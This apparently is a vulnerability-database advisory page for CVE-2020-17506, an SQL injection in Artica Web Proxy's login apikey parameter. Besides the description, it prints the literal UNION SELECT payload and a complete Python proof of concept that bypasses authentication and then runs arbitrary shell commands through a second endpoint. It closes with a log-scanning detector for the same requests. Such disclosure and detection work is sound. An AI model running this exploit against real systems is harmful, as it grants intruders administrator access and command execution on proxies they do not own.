VYPR
Unrated severity · NVD Advisory · Published Aug 12, 2020 · Updated Aug 4, 2024

CVE-2020-17506

Description

Artica Web Proxy 4.30.00000000 allows SQL injection in apikey parameter to bypass authentication and gain admin privileges.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

Artica Web Proxy version 4.30.00000000 contains a SQL injection vulnerability in the apikey parameter of fw.login.php. This allows an unauthenticated remote attacker to manipulate SQL queries and bypass privilege checks, ultimately achieving administrator-level access to the web backend. The affected version is explicitly 4.30.00000000 [1][2].

Exploitation

An attacker can exploit this by sending a crafted HTTP request to the fw.login.php endpoint with a malicious apikey parameter. No authentication is required, and the attack can be performed remotely over the network. The SQL injection allows the attacker to inject arbitrary SQL commands, leading to authentication bypass [1].

Impact

Successful exploitation grants the attacker full administrative privileges on the Artica Proxy web interface. This compromises the confidentiality, integrity, and availability of the proxy system, allowing the attacker to read sensitive data, modify configurations, or potentially execute further commands [1][2].

Mitigation

As of the publication date (August 12, 2020), no official patch or fixed version has been disclosed in the available references. Users are advised to monitor vendor updates and consider restricting network access to the administrative interface as a temporary workaround. The vulnerability is not listed on CISA's Known Exploited Vulnerabilities (KEV) catalog.

AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 2

Patches: 0

No patches discovered yet.

Vulnerability mechanics

Root cause

"The application is vulnerable to SQL injection via the apikey parameter in fw.login.php, allowing privilege escalation."

Attack vector

A remote attacker can send a crafted request to the `fw.login.php` endpoint with a malicious `apikey` parameter. This parameter contains a SQL UNION SELECT statement that manipulates the query to bypass privilege checks. The payload `'%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;'` is used to inject SQL code, effectively granting the attacker administrator privileges [1].

Affected code

The vulnerability exists in the `fw.login.php` file, specifically in the handling of the `apikey` parameter. The provided exploit code targets this endpoint to inject SQL commands [1].

What the fix does

The advisory does not specify a patch or provide details on how the vulnerability is fixed. Remediation guidance suggests updating to a secure version, but specific code changes are not detailed.

Preconditions

  • network: The target must be accessible over the network.
  • input: The attacker must be able to send a crafted HTTP request with a malicious `apikey` parameter.

Reproduction

```python
import requests
import argparse
from bs4 import BeautifulSoup


def bypass_auth(session, args):
    # Same session object is reused so the cookie set by the login response is kept.
    login_endpoint = "/fw.login.php?apikey="
    payload = "%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"

    print("[+] Bypassing authentication...")
    session.get(args.host + login_endpoint + payload, verify=False)

    return session


def run_command(session, args):
    cmd_endpoint = "/cyrus.index.php?service-cmds-peform=||{}||".format(args.command)
    print("[+] Running command: {}".format(args.command))
    response = session.post(args.host + cmd_endpoint, verify=False)
    # The command output is returned inside the second <code> element of the page.
    soup = BeautifulSoup(response.text, "html.parser")
    print(soup.find_all("code")[1].get_text())


def main():
    parser = argparse.ArgumentParser(description="CVE-2020-17506 Artica PoC.")
    parser.add_argument(
        "--host",
        help="The host to target. Format example: https://host:port",
    )
    parser.add_argument("--command", help="The command to run")

    args = parser.parse_args()
    if not args.host or not args.command:
        parser.print_help()
        exit(0)
    session = requests.Session()
    session = bypass_auth(session, args)

    run_command(session, args)


if __name__ == "__main__":
    main()
```
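As an added defensive counterpart to the PoC above (example code written for this page, not part of the advisory or of the Artica project), the following scans web-server access-log lines for the two request shapes the advisory describes: a quoted UNION SELECT in the `apikey` parameter of `fw.login.php`, and follow-on calls to the `cyrus.index.php` command endpoint. The log lines are constructed samples, and the combined-log regex and label names are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample access-log lines (Apache combined format); not taken from the advisory.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Aug/2020:10:01:02 +0000] "GET /fw.login.php?apikey=abc123 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Aug/2020:10:01:07 +0000] "GET /fw.login.php?apikey=%27UNION%20select%201,%27eA==%27; HTTP/1.1" 302 0 "-" "python-requests/2.24"
10.0.0.9 - - [12/Aug/2020:10:01:09 +0000] "POST /cyrus.index.php?service-cmds-peform=||id|| HTTP/1.1" 200 2048 "-" "python-requests/2.24"
10.0.0.7 - - [12/Aug/2020:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Client IP, method and request target of a combined-format log line.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) ')
# A quote followed by UNION ... SELECT: the shape of the apikey injection described above.
UNION_RE = re.compile(r"""['"]\s*union\s+(all\s+)?select""", re.IGNORECASE)


def query_param(target, name):
    """Return the decoded value of `name` in a request target, or None (decodes twice so %2527 is still a quote)."""
    for pair in urlsplit(target).query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return unquote(unquote(value))
    return None


def classify(target):
    """Label one request target: 'sqli-apikey', 'cmd-endpoint' or None."""
    parts = urlsplit(target)
    if parts.path.endswith("/fw.login.php"):
        apikey = query_param(target, "apikey")
        if apikey is not None and UNION_RE.search(apikey):
            return "sqli-apikey"
    # Follow-on command endpoint used by the published PoC once a session is obtained.
    if parts.path.endswith("/cyrus.index.php") and "service-cmds-peform=" in parts.query:
        return "cmd-endpoint"
    return None


def find_suspicious(log_text):
    """Return (client_ip, label) for every log line whose request matches."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m:
            label = classify(m.group("target"))
            if label:
                hits.append((m.group("ip"), label))
    return hits
```

Correlating both labels from one client IP within a short window is the stronger alert, since a single `fw.login.php` hit with a quote in `apikey` can also come from a scanner that never obtained a session.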

Generated on Jun 2, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References: 3

News mentions: 0

No linked articles in our index yet.